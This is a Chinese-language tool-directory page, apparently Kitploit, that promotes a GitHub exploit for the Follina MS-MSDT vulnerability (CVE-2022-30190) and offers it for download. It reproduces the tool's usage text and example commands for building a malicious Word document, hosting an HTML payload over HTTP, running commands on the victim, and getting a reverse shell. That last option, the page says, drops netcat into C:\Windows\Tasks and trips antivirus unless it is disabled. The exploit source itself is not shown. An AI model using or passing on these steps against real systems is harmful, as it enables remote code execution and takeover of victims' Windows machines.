Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
FOLLINA-CVE-2022-30190 — FOLLINA-CVE-2022-30190 的实现 | Kitploit
工具/GitHubGitHub/toxicenvelope/follina-cve-2022-30190
Payload生成漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队
GitHubtoxicenvelope/follina-cve-2022-30190

FOLLINA-CVE-2022-30190

FOLLINA-CVE-2022-30190 的实现

查看仓库
113年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

FOLLINA-CVE-2022-30190

FOLLINA-CVE-2022-30190 的实现


本仓库包含针对漏洞 FOLLINA-CVE-2022-30190 的利用工具

免责声明

本工具仅用于安全测试和研究目的。 克隆/复刻本工具即表示原始开发者不对行为人的行为承担任何责任。


先决条件

  1. 从此处了解 CVE-2022-30190
  2. 准备测试环境(建议使用 Virtual Box + Vagrant)
  • 从此处下载 VirtualBox
  • 从此处下载 Vagrant
  • 从此处了解 Vagrant CLI

通过构造恶意的 Microsoft Word 文档来发起 "Follina" MS-MSDT 攻击,并通过 HTTP 服务器托管 payload。

用法

root@kitploit:~
usage: exploit.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            显示此帮助信息并退出
  --command COMMAND
                        要在目标上执行的命令(默认:calc)
  --output OUTPUT 
                        输出的恶意文档文件(默认:./follina.doc)
  --interface INTERFACE
                        用于托管 HTTP 服务器的网络接口或 IP 地址(默认:eth0)
  --port PORT           
                        托管 HTTP 服务器的端口(默认:8000)

示例

弹出 calc.exe:

root@kitploit:~
$ python3 exploit.py   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./cve202230190.doc
[+] serving html payload on :8000

弹出 cmd.exe:

root@kitploit:~
$ python3 exploit.py --command "cmd"

在端口 9001 上获取反向 shell。注意,这会将 netcat 二进制文件下载到受害者计算机并放置在 C:\Windows\Tasks 中。 它不会清理二进制文件。除非禁用防病毒软件,否则会触发防病毒检测。

root@kitploit:~
$ python3 exploit.py --reverse 9001
下载工具